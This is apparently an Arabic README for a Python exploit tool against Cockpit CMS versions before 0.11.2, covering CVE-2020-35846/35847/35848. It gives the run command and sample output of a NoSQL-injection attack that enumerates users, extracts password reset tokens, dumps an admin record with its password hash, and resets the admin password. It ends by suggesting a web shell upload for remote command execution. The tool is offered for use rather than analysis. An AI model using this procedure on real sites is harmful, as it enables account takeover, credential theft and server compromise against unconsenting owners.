
CVE-2020-35847, CVE-2020-35848 : الاستيلاء على الحساب
يكون نظام Cockpit CMS قبل الإصدار 0.11.2 عرضة لثغرة حقن NoSQL في /auth/resetpassword و /auth/newpassword، مما يسمح باستخراج رموز إعادة تعيين كلمة المرور، والتي تتيح تعداد تفاصيل المستخدمين بالإضافة إلى إعادة تعيين كلمة المرور.
اقرأ المزيد - https://swarm.ptsecurity.com/rce-cockpit-cms/
يقوم هذا السكربت المكتوب بلغة Python بتعداد المستخدمين على النظام، وإعادة تعيين كلمة المرور.
python3 exploit.py -u http://cockpit-site-url
يقوم السكربت أولاً بتعداد المستخدمين على النظام.
[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) :
[+] Users Found : ['admin', 'user1', 'user2', 'user3']
بعد ذلك يمكنك اختيار المستخدم الذي تريد جمع مزيد من المعلومات عنه. كما يقوم هذا أيضًا بإنشاء رموز إعادة تعيين لهذا المستخدم، وهو مطلب أساسي في عملية إعادة تعيين كلمة المرور.
[-] Get user details For : admin
[+] Finding Password reset tokens
Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information
-----------------Details--------------------
[*] user : admin
[*] name : Admin
[*] email : [email protected]
[*] active : True
[*] group : admin
[*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
[*] i18n : en
[*] _created : 1621655201
[*] _modified : 1621655201
[*] _id : 60a87ea165343539ee000300
[*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
[*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------
أخيرًا، يمكنك اختيار إعادة تعيين كلمة مرور المستخدم.
[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is:
Username : admin
Password : new_random_password
يمكنك بعد ذلك اختيار رفع ويب شيل إلى مكوّن /finder للحصول على تنفيذ الأوامر عن بُعد (RCE).